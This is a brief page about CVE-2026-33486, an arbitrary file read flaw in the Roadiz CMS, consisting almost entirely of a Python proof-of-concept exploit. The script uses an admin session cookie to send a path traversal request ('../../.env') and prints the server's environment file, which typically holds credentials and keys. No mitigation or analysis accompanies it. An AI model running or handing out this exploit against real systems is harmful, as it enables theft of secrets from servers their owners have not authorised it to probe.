CVE-2026-33486 Roadiz 任意文件读取漏洞

import requests # Target URL (Example) target_url = "http://example.com/documents/view" # Attacker's authenticated session cookie (High privileges required) cookies = { "PHPSESSID": "valid_admin_session_id" } # Malicious payload to read environment variables # Exploiting path traversal in the document handling component params = { "path": "../../.env" } try: response = requests.get(target_url, params=params, cookies=cookies) if response.status_code == 200: print("[+] Vulnerability exploited successfully!") print("[+] Sensitive file content:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")